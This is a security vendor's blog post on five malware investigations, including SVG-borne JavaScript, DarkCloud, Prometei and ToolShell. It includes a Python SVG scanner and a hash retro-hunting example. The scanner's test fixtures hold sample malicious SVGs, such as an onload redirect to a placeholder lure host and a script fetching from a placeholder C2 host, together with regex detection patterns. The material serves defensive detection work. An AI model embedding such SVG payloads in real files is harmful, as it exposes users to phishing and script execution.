Security teams don’t just need alerts; they need answers. At Stairwell, we’ve seen how easily malware evades detection when defenders rely solely on behavior, logs, or static IOCs. Some threats hide inside image files. Others remain dormant for months. Many are missed not because they’re advanced, but because no one was looking in the right place.
This post walks through five recent investigations where we uncovered malware hiding in plain sight. Each summary includes what you’ll learn, what the threat looks like, and a YARA rule you can use to detect it in your own environment.
Are Your SVGs Malicious?
Attackers are embedding malicious JavaScript inside SVG files to deliver payloads in phishing campaigns and dropper chains. These files often look benign and pass through traditional scanners without raising flags because they’re treated like static images. In practice an SVG is an XML document, and a browser that opens one directly (as a downloaded attachment or a top-level page) executes any script it carries, while the same file referenced from an <img> tag does not; that gap is exactly what phishing lures exploit.
In this blog, we break down how attackers abuse SVG formatting, how these files behave once deployed, and what makes them difficult to detect with standard tooling. You’ll learn how to hunt them using static traits and file structure analysis.
Download the YARA rule to detect malicious SVG payloads
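As an added illustration of the static, structure-based hunting described above (example code written for this post, not the Stairwell rule linked here), the following Python scanner parses an SVG as XML and reports the traits that let a file carry script: script elements, on* event-handler attributes, href/src values that resolve to javascript: or data:text/html, foreignObject (embedded HTML), and SMIL set/animate elements that target an event-handler attribute. Files that fail to parse are swept at the byte level instead of being skipped, since browsers still render malformed SVG. All sample files and hostnames (lure.example, c2.example) are constructed for the demo.

```python
import re
import xml.etree.ElementTree as ET

# Attribute names (after namespace stripping) that may carry a script URI.
URI_ATTRS = {"href", "src", "data"}
SCRIPT_URI = re.compile(r"^\s*(javascript:|vbscript:|data:text/html|data:image/svg\+xml)", re.I)
# Byte-level markers used only when the XML parser gives up on the file.
RAW_MARKERS = re.compile(rb"<\s*script\b|\bon[a-z]+\s*=|javascript:", re.I)


def _local(qname):
    """Strip the namespace: '{http://www.w3.org/2000/svg}script' -> 'script'."""
    return qname.rsplit("}", 1)[-1]


def scan_svg(data: bytes) -> list:
    """Return (reason, detail) findings for one SVG blob.

    An empty list means no script-bearing trait was found; it is not proof
    that the file is benign."""
    findings = []
    try:
        root = ET.fromstring(data)
    except ET.ParseError:
        # Broken XML still renders through a browser's HTML parser, so do not
        # skip it: fall back to a byte sweep for the same traits.
        for m in RAW_MARKERS.finditer(data):
            findings.append(("raw marker in unparseable XML", m.group(0).decode(errors="replace")))
        return findings

    for el in root.iter():
        if not isinstance(el.tag, str):
            continue  # comments / processing instructions
        tag = _local(el.tag)
        if tag == "script":
            findings.append(("script element", (el.text or "").strip()[:60]))
        elif tag == "foreignObject":
            findings.append(("foreignObject (embedded HTML)", ""))
        elif tag in ("set", "animate") and el.get("attributeName", "").lower().startswith("on"):
            # SMIL can install a handler without ever writing on*= directly.
            findings.append((f"{tag} targeting event handler", el.get("attributeName")))
        for attr, value in el.attrib.items():
            name = _local(attr)
            if name.lower().startswith("on"):
                # Every on* attribute in SVG is an event handler.
                findings.append(("event-handler attribute", f"{name}={value[:60]}"))
            elif name in URI_ATTRS and SCRIPT_URI.match(value):
                findings.append(("script URI", f"{name}={value[:60]}"))
    return findings


# Constructed samples: one benign file and five script-bearing variants.
SAMPLES = {
    "benign.svg": b'<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
                  b'<circle cx="5" cy="5" r="4" fill="red"/></svg>',
    "onload.svg": b'<svg xmlns="http://www.w3.org/2000/svg" '
                  b'onload="window.location=\'https://lure.example/\'"><rect width="1" height="1"/></svg>',
    "script.svg": b'<svg xmlns="http://www.w3.org/2000/svg"><script type="text/javascript">'
                  b'fetch("https://c2.example/p")</script></svg>',
    "anchor.svg": b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
                  b'<a xlink:href="javascript:alert(1)"><text>Open</text></a></svg>',
    "set.svg": b'<svg xmlns="http://www.w3.org/2000/svg"><set attributeName="onmouseover" to="alert(1)"/></svg>',
    # Unclosed root element: the XML parser rejects it, the byte sweep still catches it.
    "broken.svg": b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script>',
}


def scan_samples(samples=SAMPLES) -> dict:
    """Scan every sample; returns {name: findings}."""
    return {name: scan_svg(blob) for name, blob in samples.items()}


if __name__ == "__main__":
    for name, findings in scan_samples().items():
        verdict = "SUSPICIOUS" if findings else "clean"
        print(f"{name:12} {verdict:10} {findings}")
```

The checks above are deliberately format-based rather than string-based: an attacker can rename the payload, minify it, or split it across entities, but an SVG that executes code must still contain a script element, a handler attribute, a script URI, or an animation that installs one, and those are the structural traits a YARA rule can key on.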
DarkCloud Stealer
DarkCloud is a stealthy info-stealer that targets Chromium-based browsers. It avoids detection by staying dormant, exfiltrating data quietly, and disguising itself as legitimate software. Behavior-based tools have nothing to observe until the sample actually runs, so a dormant copy sitting on disk produces no alert at all; only the file itself gives it away.
This blog covers how the malware operates, how we identified it through file characteristics, and how defenders can catch it before it activates. You’ll also get a rule that searches for dormant DarkCloud samples already present on disk.
Download the YARA rule to detect DarkCloud variants
RedDirection
RedDirection is a persistent adversary that reuses its tooling across multiple campaigns. The filenames and hashes may change, but the structure and logic of the malware remain consistent. That consistency makes it detectable.
The blog outlines how we tracked RedDirection’s operations through reused loader components and artifacts. You’ll learn how to identify these toolkits using pattern-based YARA logic that holds even when the threat is repackaged.
Download the YARA rule to detect RedDirection artifacts
Prometei Evolves
Prometei is a modular botnet that continues to evolve. After analyzing a published threat report, we identified 53 previously unseen variants and five new hashes not included in the original write-up. These were uncovered through variant-aware analysis and continuous file reprocessing.
In this blog, we walk through the variant discovery process and explain how to use our YARA rules and hashes to go back and find what traditional tools missed. This is retroactive detection that scales.
Download 3 YARA rules to detect Prometei variants and 5 missed hashes
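To make the retroactive-detection step concrete, here is an added Python example (written for this post, not Stairwell's tooling) of the hash side of the process: hash every file under a root once into an index, then match any IOC list against that index without re-reading disk, so a variant list published after the original report can be checked against files that were already present. The directory layout, file contents and the "original report" and "variant list" hash sets are all constructed inside the demo.

```python
import hashlib
import os
import shutil
import tempfile
from collections import defaultdict

CHUNK = 1 << 20  # read files in 1 MiB pieces so large binaries do not load into memory


def sha256_file(path: str) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(CHUNK), b""):
            h.update(chunk)
    return h.hexdigest()


def build_index(root: str) -> dict:
    """Hash every regular file under root once: sha256 -> [paths]."""
    index = defaultdict(list)
    for dirpath, _, names in os.walk(root):
        for name in names:
            p = os.path.join(dirpath, name)
            if os.path.isfile(p) and not os.path.islink(p):
                index[sha256_file(p)].append(p)
    return index


def retro_hunt(index: dict, ioc_hashes) -> tuple:
    """Match an IOC hash list against the stored index.

    Returns (hits, unmatched): hits maps each matched hash to its on-disk
    paths; unmatched lists the hashes not present, which is what you would
    feed into the next round of variant hunting."""
    wanted = {h.strip().lower() for h in ioc_hashes if h.strip()}
    hits = {h: index[h] for h in wanted if h in index}
    return hits, sorted(wanted - set(hits))


def demo() -> dict:
    root = tempfile.mkdtemp(prefix="retrohunt-")
    try:
        # Constructed files standing in for a benign document and two malware variants.
        contents = {
            "report.pdf": b"%PDF-1.4 benign placeholder\n",
            "updater.exe": b"MZ\x90\x00 constructed sample A\n",
            "cache/tmp.bin": b"MZ\x90\x00 constructed sample B\n",
        }
        for rel, data in contents.items():
            p = os.path.join(root, rel)
            os.makedirs(os.path.dirname(p), exist_ok=True)
            with open(p, "wb") as f:
                f.write(data)

        index = build_index(root)  # built once, reused for every IOC list below

        # Constructed IOC lists: the first mirrors what an initial report disclosed,
        # the second a later variant list plus one hash that is not on disk.
        original_report = [hashlib.sha256(contents["updater.exe"]).hexdigest()]
        variant_list = [hashlib.sha256(contents["cache/tmp.bin"]).hexdigest(), "0" * 64]

        def rel(paths):
            return sorted(os.path.relpath(p, root).replace(os.sep, "/") for p in paths)

        first_hits, _ = retro_hunt(index, original_report)
        second_hits, unmatched = retro_hunt(index, variant_list)
        return {
            "index_size": len(index),
            "first_hits": rel(p for ps in first_hits.values() for p in ps),
            "second_hits": rel(p for ps in second_hits.values() for p in ps),
            "unmatched": unmatched,
        }
    finally:
        shutil.rmtree(root, ignore_errors=True)


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

In a real deployment the index would be persisted (a database keyed by hash, with the file's first-seen time and origin) so that every new hash list, including the 1,006 curated hashes mentioned below, can be answered from data already collected rather than by rescanning endpoints.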
ToolShell
ToolShell is a suite of webshell malware that hides inside legitimate-looking web activity. It’s designed to blend in with everyday traffic and persists by abusing common file paths and content types. Most tools miss it because there’s nothing overtly malicious about the behavior.
This blog explains how ToolShell operates and how we used static detection to fingerprint core components. The included rule focuses on structural attributes that persist across variants, allowing defenders to detect ToolShell even in heavily obfuscated forms.
Download the YARA rule to detect ToolShell webshell variants
Why This Matters
If there is one consistent theme across these cases, it is this: most of the threats were already present in the environment. They were not missed because they were advanced. They were missed because defenders relied on point-in-time signals like alerts, logs, or execution behavior. Those signals only tell part of the story. The rest lives in the files themselves.
The Hidden Malware Report
To understand how common this gap is, we published The Hidden Malware Report. The report analyzes 769 public threat reports published between March 2023 and July 2025. Across those reports, 10,262 malware hashes were shared. Using those as a starting point, Stairwell uncovered an additional 16,104 malware variants through continuous reanalysis. That represents a 157% increase in detection coverage beyond what was publicly disclosed. The report also includes a curated set of 1,006 hashes that defenders can download to begin their own variant hunting.
Download the full report to see how your coverage stacks up